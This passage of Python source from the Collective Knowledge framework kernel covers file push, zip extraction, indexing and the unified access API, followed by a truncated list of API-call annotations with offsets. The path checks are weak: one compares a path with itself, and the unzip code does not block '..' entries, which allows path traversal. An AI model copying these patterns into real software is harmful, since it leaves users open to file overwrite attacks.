if os.path.isfile(pfn):
return {'return':1, 'error':'archive file already exists in the current directory'}
# Prepare archive
import zipfile
zip_method=zipfile.ZIP_DEFLATED
gaf=i.get('all','')
fl={}
if len(pats)>0:
for q in pats:
r=list_all_files({'path':p, 'all':gaf, 'pattern':q})
if r['return']>0: return r
flx=r['list']
for k in flx:
fl[k]=flx[k]
else:
r=list_all_files({'path':p, 'all':gaf})
if r['return']>0: return r
fl=r['list']
# Write archive
try:
f=open(pfn, 'wb')
z=zipfile.ZipFile(f, 'w', zip_method)
for fn in fl:
if st!='yes' or not fn.startswith('tmp'):
p1=os.path.join(p, fn)
z.write(p1, fn, zip_method)
z.close()
f.close()
except Exception as e:
return {'return':1, 'error':'failed to prepare archive ('+format(e)+')'}
# If add to JSON
if tj:
r=convert_file_to_upload_string({'filename':pfn})
if r['return']>0: return r
rr['file_content_base64']=r['file_content_base64']
if delete_file!='': os.remove(delete_file)
return rr
##############################################################################
# Push data
#
# TARGET: CK kernel and low-level developers
def push(i):
"""
Input: {
(repo_uoa) - repo UOA, if needed
module_uoa - module UOA
data_uoa - data UOA
(filename) - local filename
or
(cid[0])
(extra_path) - extra path inside entry (create if doesn't exist)
(file_content_base64) - if !='', take its content and record into filename
(archive) - if 'yes' push to entry and unzip ...
(overwrite) - if 'yes', overwrite files
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
# Check if global writing is allowed
r=check_writing({})
if r['return']>0: return r
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# Check file
fn=i.get('filename','')
if fn=='':
x=i.get('cids',[])
if len(x)>0:
fn=x[0]
if fn=='':
return {'return':1, 'error':'filename is empty'}
fcb=False
if 'file_content_base64' in i:
import base64
bin=base64.urlsafe_b64decode(i['file_content_base64'].encode('utf8')) # convert from unicode to str since base64 works on strings
# should be safe in Python 2.x and 3.x
fcb=True
else:
if not os.path.isfile(fn):
return {'return':1, 'error':'file '+fn+' not found'}
# Attempt to load data (to find path, etc)
rx=load({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if rx['return']>0: return rx
p=rx['path']
muoa=rx['module_uoa']
duoa=rx['data_uoa']
dd=rx['dict']
px=os.path.normpath(os.path.join(p, cfg['subdir_ck_ext']))
ruoa=rx['repo_uoa']
ruid=rx['repo_uid']
# Check repo/module writing
ii={'module_uoa':muoa, 'repo_uoa':ruoa, 'repo_uid':ruid}
r=check_writing(ii)
if r['return']>0: return r
rd=r.get('repo_dict',{})
rshared=rd.get('shared','')
rsync=rd.get('sync','')
# Prepare path
p1=i.get('extra_path','')
if p1!='':
p2=os.path.normpath(os.path.join(p,p1))
if not p2.startswith(p):
return {'return':1,'error':'extra path is outside entry'}
p=p2
# Create missing dirs
if not os.path.isdir(p): os.makedirs(p)
overwrite=i.get('overwrite','')
# Copy or record file
p3=os.path.normpath(os.path.join(p, fn))
if not p3.startswith(p3):
return {'return':1,'error':'extra path is outside entry'}
if p3.startswith(px):
return {'return':1, 'error':'path points to the special directory with meta info'}
if os.path.isfile(p3) and overwrite!='yes':
return {'return':1,'error':'file already exists in the entry'}
if fcb:
try:
f=open(p3, 'wb')
f.write(bin)
f.close()
except Exception as e:
return {'return':1, 'error':'problem writing text file='+p3+' ('+format(e)+')'}
else:
import shutil
shutil.copyfile(fn, p3)
# Process if archive
y=''
if i.get('archive','')=='yes':
rx=unzip_file({'archive_file':p3,
'path':p,
'overwrite':overwrite,
'delete_after_unzip':'yes'})
if rx['return']>0: return rx
y='and unziped '
if rshared!='':
ppp=os.getcwd()
pp=os.path.split(p)
pp0=pp[0]
pp1=pp[1]
os.chdir(pp0)
ss=cfg['repo_types'][rshared]['add'].replace('$#files#$', pp1)
rx=os.system(ss)
os.chdir(ppp)
if o=='con':
out('File was pushed '+y+'successfully!')
return {'return':0}
##############################################################################
# List files in a given entry
#
# TARGET: end users
def unzip_file(i):
"""
Input: {
archive_file - full path to zip file
(path) - path where unzip (current if empty)
(overwrite) - if 'yes', overwrite
(delete_after_unzip) - if 'yes', delete original zip file after unzipping
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
skipped - list of files which was not overwritten
}
"""
import zipfile
p=i.get('path','')
if p=='':
p=os.getcwd()
p3=i['archive_file']
overwrite=i.get('overwrite','')
dau=i.get('delete_after_unzip','')
s=[]
f=open(p3,'rb')
z=zipfile.ZipFile(f)
for d in z.namelist():
if not d.startswith('.') and not d.startswith('/') and not d.startswith('\\'):
pp=os.path.join(p,d)
if d.endswith('/'):
# create directory
if not os.path.exists(pp): os.makedirs(pp)
else:
ppd=os.path.dirname(pp)
if not os.path.exists(ppd): os.makedirs(ppd)
# extract file
if os.path.isfile(pp) and overwrite!='yes':
s.append(d)
else:
fo=open(pp, 'wb')
fo.write(z.read(d))
fo.close()
f.close()
if dau=='yes':
os.remove(p3)
return {'return':0, 'skipped':s}
##############################################################################
# List files in a given entry
#
# TARGET: end users
def list_files(i):
"""
Input: {
(repo_uoa)
(module_uoa)
(data_uoa)
parameters for function 'list_all_files'
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output of list all files
}
"""
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# Get info about entry
r=load({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
# Get files
ii={'path':p}
if i.get('limit','')!='': ii['limit']=i['limit']
if i.get('number','')!='': ii['number']=i['number']
if i.get('all','')!='': ii['all']=i['all']
r=list_all_files(ii)
if r['return']>0: return r
if o=='con':
for q in r.get('list',[]):
out(q)
return r
##############################################################################
# convert_cm_to_ck
#
# TARGET: internal use
def convert_cm_to_ck(i): # pragma: no cover
"""
Input: {
(repo_uoa) - repo UOA with wild cards
(module_uoa) - module UOA with wild cards
(data_uoa) - data UOA with wild cards
(print_full) - if 'yes', show CID (repo_uoa:module_uoa:data_uoa)
(print_time) - if 'yes'. print elapse time at the end
(ignore_update) - if 'yes', do not add info about update
(time_out) - in sec. (default -1, i.e. no timeout)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import sys
o=i.get('out','')
# Check wildcards
lst=[]
to=i.get('time_out','')
if to=='': to='-1'
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if ruoa=='': ruoa='*'
if muoa=='': muoa='*'
if duoa=='': duoa='*'
pf=i.get('print_full','')
if pf=='': pf='yes'
ii={}
ii['out']=o
ii['repo_uoa']=ruoa
ii['module_uoa']=muoa
ii['data_uoa']=duoa
ii['filter_func_addr']=getattr(sys.modules[__name__], 'filter_convert_cm_to_ck')
ii['do_not_add_to_lst']='yes'
ii['print_time']=i.get('print_time','')
ii['print_time']=i.get('print_time','')
ii['print_full']=pf
ii['time_out']=to
ii['ignore_update']=i.get('ignore_update','')
return list_data(ii)
##############################################################################
# convet cm to ck filter
#
# TARGET: internal use
def filter_convert_cm_to_ck(i): # pragma: no cover
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
o=i.get('out','')
i['out']=''
rx=load(i)
i['out']=o
if rx['return']>0: return rx
ruid=rx['repo_uid']
muid=rx['module_uid']
duid=rx['data_uid']
d=rx['dict']
info=rx.get('info',{})
# Converting
if 'cm_access_control' in d:
if 'cm_outdated' not in info: info['cm_outdated']={}
info['cm_outdated']['cm_access_control']=d['cm_access_control']
del (d['cm_access_control'])
if 'cm_display_as_alias' in d:
info['data_name']=d['cm_display_as_alias']
del(d['cm_display_as_alias'])
if 'powered_by' in d:
if 'cm_outdated' not in info: info['cm_outdated']={}
info['cm_outdated']['powered_by']=d['powered_by']
del(d['powered_by'])
if 'cm_description' in d:
info['description']=d['cm_description']
del(d['cm_description'])
if 'cm_updated' in d:
dcu=d['cm_updated'][0]
cidate=dcu.get('cm_iso_datetime','')
cuoa=dcu.get('cm_user_uoa','')
if 'control' not in info:
info['control']={}
if cidate!='':
info['control']['iso_datetime']=cidate
if cuoa!='':
info['control']['author_uoa']=cuoa
info['control']['engine']='CM'
info['control']['version']=[]
del(d['cm_updated'])
if 'version' in info: del(info['version'])
# Saving
ii={'action':'update',
'repo_uoa':ruid,
'module_uoa':muid,
'data_uoa':duid,
'substitute':'yes',
'dict':d,
'info':info,
'ignore_update':i.get('ignore_update','')
}
rx=update(ii)
return rx
##############################################################################
# add index
#
# TARGET: CK kernel and low-level developers
def add_index(i):
"""
Input: {
(repo_uoa) - repo UOA with wild cards
(module_uoa) - module UOA with wild cards
(data_uoa) - data UOA with wild cards
(print_full) - if 'yes', show CID (repo_uoa:module_uoa:data_uoa)
(print_time) - if 'yes'. print elapse time at the end
(time_out) - in sec. (default -1, i.e. no timeout)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import sys
o=i.get('out','')
# Check wildcards
lst=[]
to=i.get('time_out','')
if to=='': to='-1'
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if ruoa=='': ruoa='*'
if muoa=='': muoa='*'
if duoa=='': duoa='*'
pf=i.get('print_full','')
if pf=='': pf='yes'
ii={}
ii['out']=o
ii['repo_uoa']=ruoa
ii['module_uoa']=muoa
ii['data_uoa']=duoa
ii['filter_func_addr']=getattr(sys.modules[__name__], 'filter_add_index')
ii['do_not_add_to_lst']='yes'
ii['print_time']=i.get('print_time','')
ii['print_full']=pf
ii['time_out']=to
return list_data(ii)
##############################################################################
# zip entries (call repo)
#
# TARGET: CK kernel and low-level developers
def zip(i):
"""
Input: {
(repo_uoa) - repo UOA with wild cards
(module_uoa) - module UOA with wild cards
(data_uoa) - data UOA with wild cards
(archive_path) - if '' create inside repo path
(archive_name) - if !='' use it for zip name
(auto_name) - if 'yes', generate name name from data_uoa: ckr-<repo_uoa>.zip
(bittorent) - if 'yes', generate zip name for BitTorrent: ckr-<repo_uid>-YYYYMMDD.zip
(overwrite) - if 'yes', overwrite zip file
(store) - if 'yes', store files instead of packing
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
if i.get('data_uoa','')!='': del(i['data_uoa'])
ruoa=i.get('repo_uoa','')
if ruoa!='':
if ruoa.find('*')<0 and ruoa.find('?')<0:
i['data_uoa']=ruoa
else:
del(i['repo_uoa'])
i['module_uoa']=cfg['module_repo_name']
i['data']=i.get('cid','')
if i.get('cid','')!='': del(i['cid'])
return access(i)
##############################################################################
# add index filter
#
# TARGET: CK kernel and low-level developers
def filter_add_index(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
o=i.get('out','')
i['out']=''
rx=load(i)
i['out']=o
if rx['return']>0: return rx
muid=rx['module_uid']
duid=rx['data_uid']
path='/'+muid+'/'+duid+'/1'
r=access_index_server({'request':'DELETE', 'path':path})
if r['return']>0: return r
r=access_index_server({'request':'PUT', 'path':path, 'dict':rx})
return r
##############################################################################
# delete index
#
# TARGET: CK kernel and low-level developers
def delete_index(i):
"""
Input: {
(repo_uoa) - repo UOA with wild cards
(module_uoa) - module UOA with wild cards
(data_uoa) - data UOA with wild cards
(print_time) - if 'yes'. print elapse time at the end
(time_out) - in sec. (default -1, i.e. no timeout)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import sys
o=i.get('out','')
# Check wildcards
lst=[]
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if ruoa=='': ruoa='*'
if muoa=='': muoa='*'
if duoa=='': duoa='*'
ii={}
ii['out']=o
ii['repo_uoa']=ruoa
ii['module_uoa']=muoa
ii['data_uoa']=duoa
ii['filter_func_addr']=getattr(sys.modules[__name__], 'filter_delete_index')
ii['do_not_add_to_lst']='yes'
return list_data(ii)
##############################################################################
# add index filter
#
# TARGET: CK kernel and low-level developers
def filter_delete_index(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
o=i.get('out','')
i['out']=''
r=load(i)
i['out']=o
if r['return']>0: return r
muid=r['module_uid']
duid=r['data_uid']
path='/'+muid+'/'+duid+'/1'
return access_index_server({'request':'DELETE', 'path':path})
##############################################################################
# Remove files and dirs even if read only
#
# TARGET: internal use
def rm_read_only(f,p,e):
import os
import stat
import errno
ex=e[1]
os.chmod(p,stat.S_IRWXU|stat.S_IRWXG|stat.S_IRWXO)
f(p)
return
############################################################################
# Universal access to all CK functions (Unified JSON/dictionary API)
#
# TARGET: end users
def access(i):
"""
Input: Can be dictionary or string (string will be converted to dictionary)
{
action
module_uoa or CID -> converted to cid
or
(cid1) - if doesn't have = and doesn't start from -- or - or @ -> appended to cids[]
(cid2) - if doesn't have = and doesn't start from -- or - or @ -> appended to cids[]
(cid3) - if doesn't have = and doesn't start from -- or - or @ -> appended to cids[]
or
(repo_uoa)
(module_uoa)
(data_uoa)
(out=type) Module output
== '' - none
== 'con' - console interaction (if from CMD, default)
== 'json' - return dict as json to console
== 'json_with_sep' - separation line and return dict as json to console
== 'json_file' - return dict as json to file
(out_file) Output file if out=='json_file'
(con_encoding) - force encoding for IO
(ck_profile) - if 'yes', profile CK
INPUT TO A GIVEN FUNCTION
NOTE: If INPUT is a string and it will be converted to INPUT dictionary as follows (the same as CK command line):
ck key1=value1 -> converted to {key1:value1}
-key10 -> converted to {key10:"yes"}
-key11=value11 -> converted to {key11:value11}
--key12 -> converted to {key12:"yes"}
--key13=value13 -> converted to {key13:value13}
@file_json -> JSON from this file will be merged with INPUT
@@ -> CK will ask user ot enter manually JSON from console and merge with INPUT
@@key -> Enter JSON manually from console and merge with INPUT under this key
@@@cmd_json -> convert string to JSON (special format) and merge with INPUT
-- xyz -> add everything after -- to "unparsed_cmd" key in INPUT
When string is converted to INPUT dictionary, "cmd" variable is set to True
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
OUTPUT FROM A GIVEN FUNCTION
}
"""
global con_encoding
# # Set fresh configuration for each access - very costly
# if cfg.get('loading_config','') == '':
# cfg['loading_config'] = 'yes'
# r=access({'action':'load',
# 'repo_uoa':cfg['repo_name_default'],
# 'module_uoa':cfg['subdir_kernel'],
# 'data_uoa':cfg['subdir_kernel_default']})
# if r['return']==0:
# cfg.update(r['dict'])
#
# r=access({'action':'load',
# 'repo_uoa':cfg['repo_name_local'],
# 'module_uoa':cfg['subdir_kernel'],
# 'data_uoa':cfg['subdir_kernel_default']})
# if r['return']==0:
# cfg.update(r['dict'])
# cfg['loading_config'] = ''
rr={'return':0}
ii={}
cmd=False
o=''
### If input is string, split into list and process in the next condition
if type(i)==str:
cmd=True
x=i.split(' ')
i=x
### If input is a list
if type(i)==list:
if len(i)==1 and i[0].strip()=='test_install':
return rr # installation test
cmd=True
rr=convert_ck_list_to_dict(i)
if rr['return']==0:
i=rr.get('ck_dict',{})
if i.get('out','')=='': i['out']='con' # Default output is console
# if called from CMD or with string
o=''
if rr['return']==0:
# Check output mode
o=i.get('out','')
### If profile
cp=i.get('ck_profile','')
if cp=='yes':
import time
start_time = time.time()
### Process request ######################################
if i.get('con_encoding','')!='': con_encoding=i['con_encoding']
### Process action ###################################
rr=init({})
if rr['return']==0:
# Run module with a given action
rr=perform_action(i)
if rr.get('out','')!='': o=rr['out']
if cp=='yes':
elapsed_time=time.time()-start_time
rr['ck_profile_time']=elapsed_time
if o=='con':
out('CK profile time: '+str(elapsed_time)+' sec.')
# Finalize call (check output) ####################################
if o=='json' or o=='json_with_sep':
if o=='json_with_sep': out(cfg['json_sep'])
rr1=dumps_json({'dict':rr})
if rr1['return']==0:
s=rr1['string']
out(s)
elif o=='json_file':
fn=i.get('out_file','')
if fn=='':
rr['return']=1
rr['error']='out==json_file but out_file is not defined in kernel access function'
else:
rr1=save_json_to_file({'json_file':fn, 'dict':rr})
if rr1['return']>0:
rr['return']=1
rr['error']=rr1['error']
# If error and CMD, output error to console
if cmd:
if rr['return']>0:
x=''
if type(i)==dict:
x=i.get('module_uoa','')
if x!='':
x='['+x+'] '
#FGG added this to fix temporal error with ElasticSearch indexing when index is empty
out(str(cfg['error'])+x+str(rr['error'])+'!')
return rr
##############################################################################
if __name__ == "__main__":
r=access(sys.argv[1:])
if 'return' not in r:
raise Exception('CK access function should always return key \'return\'!')
exit(int(r['return']))
|
[
"os.mkdir",
"os.remove",
"json.dumps",
"os.path.isfile",
"sys.stdout.flush",
"os.close",
"shutil.rmtree",
"os.path.join",
"urllib2.urlopen",
"os.chdir",
"urllib2.HTTPPasswordMgrWithDefaultRealm",
"shutil.copy",
"os.path.abspath",
"os.path.dirname",
"urllib2.Request",
"os.path.exists",
"shlex.split",
"copy",
"site.getsitepackages",
"os.path.normpath",
"urllib.urlretrieve",
"shutil.copyfile",
"sys.stdout.buffer.write",
"urllib2.HTTPBasicAuthHandler",
"sys.stderr.flush",
"datetime.datetime.now",
"imp.load_module",
"elasticsearch.Elasticsearch",
"copy.deepcopy",
"subprocess.Popen",
"os.chmod",
"hashlib.md5",
"os.stat",
"os.path.basename",
"imp.find_module",
"base64.urlsafe_b64encode",
"os.path.realpath",
"os.rename",
"os.system",
"struct.calcsize",
"time.sleep",
"re.match",
"sys.stderr.buffer.write",
"datetime.datetime.strptime",
"urllib.urlencode",
"inspect.currentframe",
"urllib2.HTTPSHandler",
"platform.system",
"os.listdir",
"sys.exit",
"webbrowser.open",
"psutil.Process",
"zipfile.ZipFile",
"os.makedirs",
"tempfile.mkstemp",
"uuid.uuid4",
"os.path.isdir",
"os.getcwd",
"distutils.sysconfig.get_python_lib",
"ssl.create_default_context",
"sys.path.insert",
"time.time",
"os.environ.get",
"random.randrange",
"os.path.splitext",
"os.path.getmtime",
"shutil.copytree",
"sys.stderr.write",
"os.path.split",
"os.path.expanduser",
"fnmatch.fnmatch"
] |
[((14392, 14410), 'copy.deepcopy', 'copy.deepcopy', (['cfg'], {}), '(cfg)\n', (14405, 14410), False, 'import copy\n'), ((14432, 14458), 'copy.deepcopy', 'copy.deepcopy', (['paths_repos'], {}), '(paths_repos)\n', (14445, 14458), False, 'import copy\n'), ((14526, 14556), 'copy.deepcopy', 'copy.deepcopy', (['paths_repos_all'], {}), '(paths_repos_all)\n', (14539, 14556), False, 'import copy\n'), ((14581, 14610), 'copy.deepcopy', 'copy.deepcopy', (['cache_repo_uoa'], {}), '(cache_repo_uoa)\n', (14594, 14610), False, 'import copy\n'), ((14636, 14666), 'copy.deepcopy', 'copy.deepcopy', (['cache_repo_info'], {}), '(cache_repo_info)\n', (14649, 14666), False, 'import copy\n'), ((14688, 14713), 'copy.deepcopy', 'copy.deepcopy', (['os.environ'], {}), '(os.environ)\n', (14701, 14713), False, 'import copy\n'), ((16710, 16728), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (16726, 16728), False, 'import sys\n'), ((18187, 18205), 'sys.stderr.flush', 'sys.stderr.flush', ([], {}), '()\n', (18203, 18205), False, 'import sys\n'), ((18600, 18612), 'sys.exit', 'sys.exit', (['rc'], {}), '(rc)\n', (18608, 18612), False, 'import sys\n'), ((23961, 23994), 'subprocess.Popen', 'subprocess.Popen', (['cmd'], {'shell': '(True)'}), '(cmd, shell=True)\n', (23977, 23994), False, 'import subprocess\n'), ((25550, 25638), 'subprocess.Popen', 'subprocess.Popen', (['cmd'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'shell': 'xshell'}), '(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell\n =xshell)\n', (25566, 25638), False, 'import subprocess\n'), ((36125, 36154), 'copy.deepcopy', 'copy.deepcopy', (["cfg['version']"], {}), "(cfg['version'])\n", (36138, 36154), False, 'import copy\n'), ((36964, 37002), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': 'xs', 'prefix': 'xp'}), '(suffix=xs, prefix=xp)\n', (36980, 37002), False, 'import tempfile\n'), ((37007, 37019), 'os.close', 'os.close', (['fd'], {}), '(fd)\n', (37015, 37019), False, 'import os\n'), ((37024, 37037), 'os.remove', 'os.remove', (['fn'], {}), '(fn)\n', (37033, 37037), False, 'import os\n'), ((39434, 39457), 'random.randrange', 'random.randrange', (['(0)', '(16)'], {}), '(0, 16)\n', (39450, 39457), False, 'import random\n'), ((47358, 47378), 'os.path.splitext', 'os.path.splitext', (['px'], {}), '(px)\n', (47374, 47378), False, 'import os\n'), ((47387, 47405), 'os.path.isfile', 'os.path.isfile', (['px'], {}), '(px)\n', (47401, 47405), False, 'import os\n'), ((54132, 54167), 'sys.path.insert', 'sys.path.insert', (['(0)', 'this_kernel_dir'], {}), '(0, this_kernel_dir)\n', (54147, 54167), False, 'import sys\n'), ((54936, 54956), 'os.path.dirname', 'os.path.dirname', (['pxx'], {}), '(pxx)\n', (54951, 54956), False, 'import os\n'), ((54964, 55009), 'os.path.join', 'os.path.join', (['pxx', "cfg['subdir_default_repo']"], {}), "(pxx, cfg['subdir_default_repo'])\n", (54976, 55009), False, 'import os\n'), ((55048, 55065), 'os.path.isdir', 'os.path.isdir', (['py'], {}), '(py)\n', (55061, 55065), False, 'import os\n'), ((56085, 56100), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (56095, 56100), False, 'from os.path import expanduser\n'), ((57021, 57115), 'os.path.join', 'os.path.join', (["work['dir_default_repo']", "cfg['module_repo_name']", "cfg['repo_name_default']"], {}), "(work['dir_default_repo'], cfg['module_repo_name'], cfg[\n 'repo_name_default'])\n", (57033, 57115), False, 'import os\n'), ((57142, 57202), 'os.path.join', 'os.path.join', (["work['dir_default_repo']", "cfg['subdir_kernel']"], {}), "(work['dir_default_repo'], cfg['subdir_kernel'])\n", (57154, 57202), False, 'import os\n'), ((57231, 57346), 'os.path.join', 'os.path.join', (["work['dir_default_kernel']", "cfg['subdir_kernel_default']", "cfg['subdir_ck_ext']", "cfg['file_meta']"], {}), "(work['dir_default_kernel'], cfg['subdir_kernel_default'], cfg[\n 'subdir_ck_ext'], cfg['file_meta'])\n", (57243, 57346), False, 'import os\n'), ((57567, 57606), 'os.path.isfile', 'os.path.isfile', (["work['dir_default_cfg']"], {}), "(work['dir_default_cfg'])\n", (57581, 57606), False, 'import os\n'), ((60744, 60807), 'os.path.join', 'os.path.join', (["work['dir_work_repo']", "cfg['file_cache_repo_uoa']"], {}), "(work['dir_work_repo'], cfg['file_cache_repo_uoa'])\n", (60756, 60807), False, 'import os\n'), ((60839, 60903), 'os.path.join', 'os.path.join', (["work['dir_work_repo']", "cfg['file_cache_repo_info']"], {}), "(work['dir_work_repo'], cfg['file_cache_repo_info'])\n", (60851, 60903), False, 'import os\n'), ((62152, 62188), 'os.path.isfile', 'os.path.isfile', (["work['dir_work_cfg']"], {}), "(work['dir_work_cfg'])\n", (62166, 62188), False, 'import os\n'), ((89164, 89186), 'os.path.join', 'os.path.join', (['p', 'alias'], {}), '(p, alias)\n', (89176, 89186), False, 'import os\n'), ((89293, 89310), 'os.path.isdir', 'os.path.isdir', (['p1'], {}), '(p1)\n', (89306, 89310), False, 'import os\n'), ((91029, 91084), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_meta']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_meta'])\n", (91041, 91084), False, 'import os\n'), ((95357, 95384), 'os.path.getmtime', 'os.path.getmtime', (['full_path'], {}), '(full_path)\n', (95373, 95384), False, 'import os\n'), ((97383, 97408), 'urllib.urlencode', 'urlencode', (["{'ck_json': s}"], {}), "({'ck_json': s})\n", (97392, 97408), False, 'from urllib import urlencode\n'), ((98637, 98663), 'urllib2.Request', 'urllib2.Request', (['url', 'post'], {}), '(url, post)\n', (98652, 98663), False, 'import urllib2\n'), ((112109, 112126), 'os.path.isfile', 'os.path.isfile', (['p'], {}), '(p)\n', (112123, 112126), False, 'import os\n'), ((119583, 119610), 'os.path.join', 'os.path.join', (['p00', 'dir_name'], {}), '(p00, dir_name)\n', (119595, 119610), False, 'import os\n'), ((124579, 124595), 'os.path.isdir', 'os.path.isdir', (['p'], {}), '(p)\n', (124592, 124595), False, 'import os\n'), ((134612, 134671), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_for_lock']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_for_lock'])\n", (134624, 134671), False, 'import os\n'), ((134692, 134710), 'os.path.isfile', 'os.path.isfile', (['pl'], {}), '(pl)\n', (134706, 134710), False, 'import os\n'), ((136022, 136045), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (136043, 136045), False, 'import datetime\n'), ((137323, 137342), 'os.path.normpath', 'os.path.normpath', (['p'], {}), '(p)\n', (137339, 137342), False, 'import os\n'), ((147043, 147063), 'webbrowser.open', 'webbrowser.open', (['url'], {}), '(url)\n', (147058, 147063), False, 'import webbrowser\n'), ((148506, 148526), 'webbrowser.open', 'webbrowser.open', (['url'], {}), '(url)\n', (148521, 148526), False, 'import webbrowser\n'), ((149983, 150003), 'webbrowser.open', 'webbrowser.open', (['url'], {}), '(url)\n', (149998, 150003), False, 'import webbrowser\n'), ((150982, 151002), 'webbrowser.open', 'webbrowser.open', (['url'], {}), '(url)\n', (150997, 151002), False, 'import webbrowser\n'), ((152998, 153018), 'webbrowser.open', 'webbrowser.open', (['url'], {}), '(url)\n', (153013, 153018), False, 'import webbrowser\n'), ((161795, 161806), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (161804, 161806), False, 'import os\n'), ((177845, 177883), 'os.path.join', 'os.path.join', (['p2', "cfg['subdir_ck_ext']"], {}), "(p2, cfg['subdir_ck_ext'])\n", (177857, 177883), False, 'import os\n'), ((177891, 177925), 'os.path.join', 'os.path.join', (['p3', "cfg['file_meta']"], {}), "(p3, cfg['file_meta'])\n", (177903, 177925), False, 'import os\n'), ((177934, 177968), 'os.path.join', 'os.path.join', (['p3', "cfg['file_info']"], {}), "(p3, cfg['file_info'])\n", (177946, 177968), False, 'import os\n'), ((177977, 178014), 'os.path.join', 'os.path.join', (['p3', "cfg['file_updates']"], {}), "(p3, cfg['file_updates'])\n", (177989, 178014), False, 'import os\n'), ((178023, 178057), 'os.path.join', 'os.path.join', (['p3', "cfg['file_desc']"], {}), "(p3, cfg['file_desc'])\n", (178035, 178057), False, 'import os\n'), ((188567, 188612), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".tmp"""', 'prefix': '"""ck-"""'}), "(suffix='.tmp', prefix='ck-')\n", (188583, 188612), False, 'import tempfile\n'), ((188667, 188679), 'os.close', 'os.close', (['fd'], {}), '(fd)\n', (188675, 188679), False, 'import os\n'), ((188684, 188697), 'os.remove', 'os.remove', (['fn'], {}), '(fn)\n', (188693, 188697), False, 'import os\n'), ((189009, 189021), 'os.system', 'os.system', (['x'], {}), '(x)\n', (189018, 189021), False, 'import os\n'), ((189539, 189557), 'os.path.isfile', 'os.path.isfile', (['fn'], {}), '(fn)\n', (189553, 189557), False, 'import os\n'), ((197439, 197477), 'os.path.join', 'os.path.join', (['pm', "cfg['subdir_ck_ext']"], {}), "(pm, cfg['subdir_ck_ext'])\n", (197451, 197477), False, 'import os\n'), ((213309, 213326), 'os.path.split', 'os.path.split', (['p1'], {}), '(p1)\n', (213322, 213326), False, 'import os\n'), ((213522, 213540), 'os.path.isfile', 'os.path.isfile', (['p1'], {}), '(p1)\n', (213536, 213540), False, 'import os\n'), ((213571, 213588), 'os.path.isdir', 'os.path.isdir', (['p1'], {}), '(p1)\n', (213584, 213588), False, 'import os\n'), ((216318, 216329), 'time.time', 'time.time', ([], {}), '()\n', (216327, 216329), False, 'import time\n'), ((245669, 245724), 'os.path.join', 'os.path.join', (['p', "cfg['subdir_ck_ext']", "cfg['file_meta']"], {}), "(p, cfg['subdir_ck_ext'], cfg['file_meta'])\n", (245681, 245724), False, 'import os\n'), ((278291, 278309), 'zipfile.ZipFile', 'zipfile.ZipFile', (['f'], {}), '(f)\n', (278306, 278309), False, 'import zipfile\n'), ((289631, 289686), 'os.chmod', 'os.chmod', (['p', '(stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)'], {}), '(p, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)\n', (289639, 289686), False, 'import os\n'), ((17245, 17269), 'json.dumps', 'json.dumps', (['ii'], {'indent': '(2)'}), '(ii, indent=2)\n', (17255, 17269), False, 'import json\n'), ((24045, 24056), 'time.time', 'time.time', ([], {}), '()\n', (24054, 24056), False, 'import time\n'), ((27476, 27529), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['t', '"""%Y-%m-%dT%H:%M:%S.%f"""'], {}), "(t, '%Y-%m-%dT%H:%M:%S.%f')\n", (27502, 27529), False, 'import datetime\n'), ((37087, 37107), 'os.path.basename', 'os.path.basename', (['fn'], {}), '(fn)\n', (37103, 37107), False, 'import os\n'), ((45798, 45816), 'os.path.isfile', 'os.path.isfile', (['fn'], {}), '(fn)\n', (45812, 45816), False, 'import os\n'), ((55158, 55174), 'distutils.sysconfig.get_python_lib', 'get_python_lib', ([], {}), '()\n', (55172, 55174), False, 'from distutils.sysconfig import get_python_lib\n'), ((55185, 55248), 'os.path.join', 'os.path.join', (['px', "cfg['kernel_dir']", "cfg['subdir_default_repo']"], {}), "(px, cfg['kernel_dir'], cfg['subdir_default_repo'])\n", (55197, 55248), False, 'import os\n'), ((55293, 55310), 'os.path.isdir', 'os.path.isdir', (['py'], {}), '(py)\n', (55306, 55310), False, 'import os\n'), ((55378, 55400), 'site.getsitepackages', 'site.getsitepackages', ([], {}), '()\n', (55398, 